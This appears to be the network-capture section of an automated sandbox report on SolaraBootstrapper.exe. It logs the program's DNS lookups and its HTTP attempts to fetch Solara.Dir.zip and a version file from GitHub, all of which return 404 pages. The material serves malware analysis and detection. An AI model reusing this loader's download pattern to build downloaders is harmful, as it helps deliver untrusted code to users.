                                                Jan 7, 2025 16:09:11.534986019 CET49706443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:11.534993887 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:11.535170078 CET49706443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:11.542803049 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:11.542870045 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:11.542896032 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:11.542922020 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:11.542941093 CET49706443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:11.542957067 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:11.542975903 CET49706443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:11.543394089 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:11.543422937 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:11.543447971 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:11.543458939 CET49706443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:11.543468952 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:11.543487072 CET49706443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:11.543498993 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:11.543593884 CET49706443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:11.543600082 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:11.544291973 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:11.544318914 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:11.544343948 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:11.544358969 CET49706443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:11.544372082 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:11.544394016 CET49706443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:11.544404030 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:11.544442892 CET49706443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:11.544447899 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:11.544888973 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:11.544913054 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:11.544961929 CET49706443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:11.544977903 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:11.545015097 CET49706443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:11.545016050 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:11.545026064 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:11.545074940 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:11.545078039 CET49706443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:11.545084000 CET44349706140.82.121.3192.168.2.5
                                                Jan 7, 2025 16:09:11.545126915 CET49706443192.168.2.5140.82.121.3
                                                Jan 7, 2025 16:09:11.545305967 CET49706443192.168.2.5140.82.121.3
                                                TimestampSource PortDest PortSource IPDest IP
                                                Jan 7, 2025 16:09:08.089036942 CET5724353192.168.2.51.1.1.1
                                                Jan 7, 2025 16:09:08.095669985 CET53572431.1.1.1192.168.2.5
                                                Jan 7, 2025 16:09:09.446777105 CET5789753192.168.2.51.1.1.1
                                                Jan 7, 2025 16:09:09.453808069 CET53578971.1.1.1192.168.2.5
                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Jan 7, 2025 16:09:08.089036942 CET192.168.2.51.1.1.10x7d86Standard query (0)github.comA (IP address)IN (0x0001)false
                                                Jan 7, 2025 16:09:09.446777105 CET192.168.2.51.1.1.10xba46Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Jan 7, 2025 16:09:08.095669985 CET1.1.1.1192.168.2.50x7d86No error (0)github.com140.82.121.3A (IP address)IN (0x0001)false
                                                Jan 7, 2025 16:09:09.453808069 CET1.1.1.1192.168.2.50xba46No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                Jan 7, 2025 16:09:09.453808069 CET1.1.1.1192.168.2.50xba46No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                Jan 7, 2025 16:09:09.453808069 CET1.1.1.1192.168.2.50xba46No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                Jan 7, 2025 16:09:09.453808069 CET1.1.1.1192.168.2.50xba46No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                • github.com
                                                • raw.githubusercontent.com
                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.549704140.82.121.34433948C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                TimestampBytes transferredDirectionData
                                                2025-01-07 15:09:08 UTC105OUTGET /quivings/Solara/raw/main/Files/Solara.Dir.zip HTTP/1.1
                                                Host: github.com
                                                Connection: Keep-Alive
                                                2025-01-07 15:09:09 UTC473INHTTP/1.1 404 Not Found
                                                Server: GitHub.com
                                                Date: Tue, 07 Jan 2025 15:09:09 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                Cache-Control: no-cache
                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                X-Frame-Options: deny
                                                X-Content-Type-Options: nosniff
                                                X-XSS-Protection: 0
                                                Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
                                                2025-01-07 15:09:09 UTC3390INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co
                                                2025-01-07 15:09:09 UTC1370INData Raw: 38 30 30 30 0d 0a 0a 0a 0a 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 0a 20 20 6c 61 6e 67 3d 22 65 6e 22 0a 20 20 0a 20 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 3d 22 61 75 74 6f 22 20 64 61 74 61 2d 6c 69 67 68 74 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 22 20 64 61 74 61 2d 64 61 72 6b 2d 74 68 65 6d 65 3d 22 64 61 72 6b 22 0a 20 20 64 61 74 61 2d 61 31 31 79 2d 61 6e 69 6d 61 74 65 64 2d 69 6d 61 67 65 73 3d 22 73 79 73 74 65 6d 22 20 64 61 74 61 2d 61 31 31 79 2d 6c 69 6e 6b 2d 75 6e 64 65 72 6c 69 6e 65 73 3d 22 74 72 75 65 22 0a 20 20 0a 20 20 3e 0a 0a 0a 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73
                                                Data Ascii: 8000<!DOCTYPE html><html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system" data-a11y-link-underlines="true" > <head> <meta charset="utf-8"> <link rel="dns
                                                2025-01-07 15:09:09 UTC1370INData Raw: 66 62 63 34 62 39 39 61 37 37 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 3d 22 64 61 72 6b 5f 68 69 67 68 5f 63 6f 6e 74 72 61 73 74 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 64 61 72 6b 5f 68 69 67 68 5f 63 6f 6e 74 72 61 73 74 2d 63 66 66 31 63 39 62 32 37 62 31 61 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 3d 22 64 61 72 6b 5f 63 6f 6c 6f 72 62 6c 69 6e 64 22 20 63 72 6f 73 73 6f 72 69 67 69
                                                Data Ascii: fbc4b99a77.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-cff1c9b27b1a.css" /><link data-color-theme="dark_colorblind" crossorigi
                                                2025-01-07 15:09:09 UTC1370INData Raw: 74 73 2f 70 72 69 6d 65 72 2d 34 34 33 30 64 33 63 32 63 31 35 30 2e 63 73 73 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 67 6c 6f 62 61 6c 2d 31 64 33 34 34 30 65 39 34 36 64 64 2e 63 73 73 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68
                                                Data Ascii: ts/primer-4430d3c2c150.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/global-1d3440e946dd.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.gith
                                                2025-01-07 15:09:09 UTC1370INData Raw: 6d 65 2d 33 31 38 66 66 37 31 30 34 35 63 66 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 6f 64 64 62 69 72 64 5f 70 6f 70 6f 76 65 72 2d 70 6f 6c 79 66 69 6c 6c 5f 64 69 73 74 5f 70 6f 70 6f 76 65 72 5f 6a 73 2d 39 64 61 36 35 32 66 35 38 34 37 39 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69
                                                Data Ascii: me-318ff71045cf.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover_js-9da652f58479.js"></script><script crossori
                                                2025-01-07 15:09:09 UTC1370INData Raw: 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 72 65 6c 61 74 69 76 65 2d 74 69 6d 65 2d 65 6c 65 6d 65 6e 74 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 66 36 64 61 34 62 33 66 61 33 34 63 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 61 75 74 6f 2d 63 6f 6d 70 6c 65 74 65 2d 65 6c 65 6d 65 6e 74 5f 64 69 73 74 5f
                                                Data Ascii: e_modules_github_relative-time-element_dist_index_js-f6da4b3fa34c.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_
                                                2025-01-07 15:09:09 UTC1370INData Raw: 69 74 68 75 62 2d 65 6c 65 6d 65 6e 74 73 2d 66 39 39 31 63 66 61 62 35 31 30 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 65 6c 65 6d 65 6e 74 2d 72 65 67 69 73 74 72 79 2d 33 62 35 33 36 32 64 33 64 34 30 32 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70
                                                Data Ascii: ithub-elements-f991cfab5105.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/element-registry-3b5362d3d402.js"></script><script crossorigin="anonymous" defer="defer" typ
                                                2025-01-07 15:09:09 UTC1370INData Raw: 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 63 6f 6c 6f 72 2d 63 6f 6e 76 65 72 74 5f 69 6e 64 65 78 5f 6a 73 2d 65 33 31 38 30 66 65 33 62 63 62 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f
                                                Data Ascii: ymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-e3180fe3bcb3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://
                                                2025-01-07 15:09:09 UTC1370INData Raw: 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 65 68 61 76 69 6f 72 73 5f 63 6f 6d 6d 65 6e 74 69 6e 67 5f 65 64 69 74 5f 74 73 2d 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 65 68 61 76 69 6f 72 73 5f 68 74 2d 38 33 63 32 33 35 2d 66 62 34 33 38 31 36 61 62 38 33 63 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73
                                                Data Ascii: n/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-fb43816ab83c.js"></script><script crossorigin="anonymous" defer="defer" type="application/javas
                                                2025-01-07 15:09:09 UTC1370INData Raw: 63 32 38 37 65 34 33 22 20 64 61 74 61 2d 74 75 72 62 6f 2d 74 72 61 6e 73 69 65 6e 74 3d 22 74 72 75 65 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 73 69 74 6f 72 2d 70 61 79 6c 6f 61 64 22 20 63 6f 6e 74 65 6e 74 3d 22 65 79 4a 79 5a 57 5a 6c 63 6e 4a 6c 63 69 49 36 62 6e 56 73 62 43 77 69 63 6d 56 78 64 57 56 7a 64 46 39 70 5a 43 49 36 49 6a 4a 47 4d 6a 59 36 4d 54 4d 34 4e 7a 55 36 4d 30 45 31 4d 7a 4e 45 52 54 6f 7a 51 6b 4a 44 4e 7a 52 45 4f 6a 59 33 4e 30 51 30 4d 7a 6b 30 49 69 77 69 64 6d 6c 7a 61 58 52 76 63 6c 39 70 5a 43 49 36 49 6a 59 34 4d 54 63 77 4d 44 59 35 4f 54 6b 78 4e 44 59 32 4e 7a 63 78 4e 44 45 69 4c 43 4a 79 5a 57 64 70 62 32 35 66 5a 57 52 6e 5a 53 49 36 49 6d 5a 79 59 53 49 73 49 6e 4a 6c 5a 32 6c 76 62 6c 39 79 5a 57
                                                Data Ascii: c287e43" data-turbo-transient="true" /><meta name="visitor-payload" content="eyJyZWZlcnJlciI6bnVsbCwicmVxdWVzdF9pZCI6IjJGMjY6MTM4NzU6M0E1MzNERTozQkJDNzREOjY3N0Q0Mzk0IiwidmlzaXRvcl9pZCI6IjY4MTcwMDY5OTkxNDY2NzcxNDEiLCJyZWdpb25fZWRnZSI6ImZyYSIsInJlZ2lvbl9yZW


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.549705185.199.109.1334433948C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                TimestampBytes transferredDirectionData
                                                2025-01-07 15:09:09 UTC135OUTGET /quivings/Solara/main/Storage/version.txt HTTP/1.1
                                                User-Agent: Solara
                                                Host: raw.githubusercontent.com
                                                Connection: Keep-Alive
                                                2025-01-07 15:09:10 UTC803INHTTP/1.1 404 Not Found
                                                Connection: close
                                                Content-Length: 14
                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                Strict-Transport-Security: max-age=31536000
                                                X-Content-Type-Options: nosniff
                                                X-Frame-Options: deny
                                                X-XSS-Protection: 1; mode=block
                                                Content-Type: text/plain; charset=utf-8
                                                X-GitHub-Request-Id: AADD:29B7FE:662F5A:719583:677D4395
                                                Accept-Ranges: bytes
                                                Date: Tue, 07 Jan 2025 15:09:10 GMT
                                                Via: 1.1 varnish
                                                X-Served-By: cache-ewr-kewr1740055-EWR
                                                X-Cache: MISS
                                                X-Cache-Hits: 0
                                                X-Timer: S1736262550.984424,VS0,VE28
                                                Vary: Authorization,Accept-Encoding,Origin
                                                Access-Control-Allow-Origin: *
                                                Cross-Origin-Resource-Policy: cross-origin
                                                X-Fastly-Request-ID: 8babbe5f5a38ad2b58889605f76de69410d799f9
                                                Expires: Tue, 07 Jan 2025 15:14:10 GMT
                                                Source-Age: 0
                                                2025-01-07 15:09:10 UTC14INData Raw: 34 30 34 3a 20 4e 6f 74 20 46 6f 75 6e 64
                                                Data Ascii: 404: Not Found


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                2192.168.2.549706140.82.121.34433948C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                TimestampBytes transferredDirectionData
                                                2025-01-07 15:09:11 UTC81OUTGET /quivings/Solara/raw/main/Files/Solara.Dir.zip HTTP/1.1
                                                Host: github.com
                                                2025-01-07 15:09:11 UTC473INHTTP/1.1 404 Not Found
                                                Server: GitHub.com
                                                Date: Tue, 07 Jan 2025 15:09:09 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                Cache-Control: no-cache
                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                X-Frame-Options: deny
                                                X-Content-Type-Options: nosniff
                                                X-XSS-Protection: 0
                                                Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
                                                2025-01-07 15:09:11 UTC3387INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co
                                                2025-01-07 15:09:11 UTC1370INData Raw: 0a 0a 0a 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 0a 20 20 6c 61 6e 67 3d 22 65 6e 22 0a 20 20 0a 20 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 3d 22 61 75 74 6f 22 20 64 61 74 61 2d 6c 69 67 68 74 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 22 20 64 61 74 61 2d 64 61 72 6b 2d 74 68 65 6d 65 3d 22 64 61 72 6b 22 0a 20 20 64 61 74 61 2d 61 31 31 79 2d 61 6e 69 6d 61 74 65 64 2d 69 6d 61 67 65 73 3d 22 73 79 73 74 65 6d 22 20 64 61 74 61 2d 61 31 31 79 2d 6c 69 6e 6b 2d 75 6e 64 65 72 6c 69 6e 65 73 3d 22 74 72 75 65 22 0a 20 20 0a 20 20 3e 0a 0a 0a 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65
                                                Data Ascii: <!DOCTYPE html><html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system" data-a11y-link-underlines="true" > <head> <meta charset="utf-8"> <link rel="dns-prefe
                                                2025-01-07 15:09:11 UTC1370INData Raw: 39 61 37 37 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 3d 22 64 61 72 6b 5f 68 69 67 68 5f 63 6f 6e 74 72 61 73 74 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 64 61 72 6b 5f 68 69 67 68 5f 63 6f 6e 74 72 61 73 74 2d 63 66 66 31 63 39 62 32 37 62 31 61 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 3d 22 64 61 72 6b 5f 63 6f 6c 6f 72 62 6c 69 6e 64 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f
                                                Data Ascii: 9a77.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-cff1c9b27b1a.css" /><link data-color-theme="dark_colorblind" crossorigin="ano
                                                2025-01-07 15:09:11 UTC1370INData Raw: 6d 65 72 2d 34 34 33 30 64 33 63 32 63 31 35 30 2e 63 73 73 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 67 6c 6f 62 61 6c 2d 31 64 33 34 34 30 65 39 34 36 64 64 2e 63 73 73 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65
                                                Data Ascii: mer-4430d3c2c150.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/global-1d3440e946dd.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubasse
